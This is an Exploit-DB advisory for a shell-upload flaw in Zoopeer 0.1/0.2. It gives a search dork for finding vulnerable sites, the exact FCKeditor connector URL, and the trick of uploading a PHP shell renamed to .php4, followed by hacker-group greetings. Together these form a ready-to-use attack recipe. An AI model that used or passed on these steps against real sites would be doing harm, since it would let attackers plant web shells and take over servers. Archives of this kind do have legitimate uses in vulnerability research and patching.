Zoopeer 0.1/0.2 - 'FCKeditor' Arbitrary File Upload

EDB-ID:

15354

CVE:

N/A




Platform:

PHP

Date:

2010-10-30


=============================================================
Zoopeer 0.1 & 0.2 (fckeditor) Zoopeer Shell Upload Vulnerability
=============================================================
###################################################
#
# Exploit Title: Zoopeer 0.1 & 0.2 (fckeditor)
# Date: 27-10-2010
# Author: Net.Edit0r
# Software Link: http://www.zoopeer.com/
# Version: 0.1 & 0.2
# Tested on: Linux Ubuntu 9.04
# dork : "Powered By Zoopeer"
# Contact: Net.Edit0r@att.net ~ Black.hat.tm@gmail.com
#
####################################################

    exploit # fck/editor/filemanager/browser/default/browser.html?Type=File&Connector=connectors/php/connector.php


first go to # http://site.com/fck


       then # http://site.com/fck/editor/filemanager/browser/default/browser.html?Type=File&Connector=connectors/php/connector.php

     select # Php renamed via the php4 (shell.php4)

Video : http://net-edit0r.persiangig.com/Film/fck.rar

#######################################################

Home : datacoders.org ~ ajaxtm.com #Iranian HackerZ

>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>

Greetz : HUrr!c4nE , H-SK33PY , Cair3x , B3hz4d , Skitt3r , Zalatan
       BHG : Net.Edit0r ~ Darkcoder ~ AmIr_Magic